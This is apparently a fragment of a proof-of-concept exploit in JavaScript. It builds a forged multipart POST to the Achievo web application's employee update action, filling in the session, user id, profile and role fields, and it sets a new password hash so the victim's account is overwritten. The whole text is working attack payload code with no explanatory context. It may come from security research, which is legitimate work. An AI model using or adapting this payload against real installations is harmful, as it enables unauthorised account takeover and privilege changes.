xmlhttp.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------12998354513597")

var mpp_str2_0 = (<r><![CDATA[
POSTDATA =-----------------------------12998354513597
Content-Disposition: form-data; name="atklevel"

1
-----------------------------12998354513597
Content-Disposition: form-data; name="atkprevlevel"

1
-----------------------------12998354513597
Content-Disposition: form-data; name="atkstackid"

]]></r>).toString();


var mpp_str2_1 = (<r><![CDATA[
-----------------------------12998354513597
Content-Disposition: form-data; name="achievo"

]]></r>).toString();


var mpp_str2_2 = (<r><![CDATA[
-----------------------------12998354513597
Content-Disposition: form-data; name="atkescape"


-----------------------------12998354513597
Content-Disposition: form-data; name="atkaction"

update
-----------------------------12998354513597
Content-Disposition: form-data; name="atkprevaction"

edit
-----------------------------12998354513597
Content-Disposition: form-data; name="atkfieldprefix"


-----------------------------12998354513597
Content-Disposition: form-data; name="atknodetype"

employee.employee
-----------------------------12998354513597
Content-Disposition: form-data; name="atkprimkey"

person.id=']]></r>).toString();


var mpp_str2_3 = (<r><![CDATA['
-----------------------------12998354513597
Content-Disposition: form-data; name="id"

]]></r>).toString();


var mpp_str2_4 = (<r><![CDATA[
-----------------------------12998354513597
Content-Disposition: form-data; name="role"

employee
-----------------------------12998354513597
Content-Disposition: form-data; name="userid"

]]></r>).toString();


var mpp_str2_5 = (<r><![CDATA[
-----------------------------12998354513597
Content-Disposition: form-data; name="lastname"

bonsai-sec
-----------------------------12998354513597
Content-Disposition: form-data; name="firstname"


-----------------------------12998354513597
Content-Disposition: form-data; name="initials"


-----------------------------12998354513597
Content-Disposition: form-data; name="address"


-----------------------------12998354513597
Content-Disposition: form-data; name="zipcode"


-----------------------------12998354513597
Content-Disposition: form-data; name="city"


-----------------------------12998354513597
Content-Disposition: form-data; name="state"


-----------------------------12998354513597
Content-Disposition: form-data; name="country"


-----------------------------12998354513597
Content-Disposition: form-data; name="phone"


-----------------------------12998354513597
Content-Disposition: form-data; name="cellular"


-----------------------------12998354513597
Content-Disposition: form-data; name="fax"


-----------------------------12998354513597
Content-Disposition: form-data; name="email"

bonsai-sec@bonsai-sec.com
-----------------------------12998354513597
Content-Disposition: form-data; name="function"


-----------------------------12998354513597
Content-Disposition: form-data; name="remark"


-----------------------------12998354513597
Content-Disposition: form-data; name="birthdate[day]"

6
-----------------------------12998354513597
Content-Disposition: form-data; name="birthdate[month]"

7
-----------------------------12998354513597
Content-Disposition: form-data; name="birthdate[year]"

2009
-----------------------------12998354513597
Content-Disposition: form-data; name="functionlevel"


-----------------------------12998354513597
Content-Disposition: form-data; name="profiles[][role_id]"

]]></r>).toString();


var mpp_str2_6 = (<r><![CDATA[
-----------------------------12998354513597
Content-Disposition: form-data; name="profiles[][role_id]"

1
-----------------------------12998354513597
Content-Disposition: form-data; name="supervisor"


-----------------------------12998354513597
Content-Disposition: form-data; name="status"

active
-----------------------------12998354513597
Content-Disposition: form-data; name="lng"

en
-----------------------------12998354513597
Content-Disposition: form-data; name="password[hash]"

]]></r>).toString();

  
var mpp_str2_7 = (<r><![CDATA[
-----------------------------12998354513597
Content-Disposition: form-data; name="password[new]"


-----------------------------12998354513597
Content-Disposition: form-data; name="password[again]"


-----------------------------12998354513597
Content-Disposition: form-data; name="bankaccount"


-----------------------------12998354513597
Content-Disposition: form-data; name="socialsecuritynumber"


-----------------------------12998354513597
Content-Disposition: form-data; name="atksaveandclose"

Save and close
-----------------------------12998354513597
Content-Disposition: form-data; name="atktab"

default
-----------------------------12998354513597--


]]></r>).toString();

var post_data2 = mpp_str2_0 + atkstackid + mpp_str2_1 + session_str + mpp_str2_2 + user_id + mpp_str2_3 + user_id  + mpp_str2_4 + user_name + mpp_str2_5 + profile_id + mpp_str2_6 + md5(user_pass) + mpp_str2_7;

xmlhttp.send(post_data2);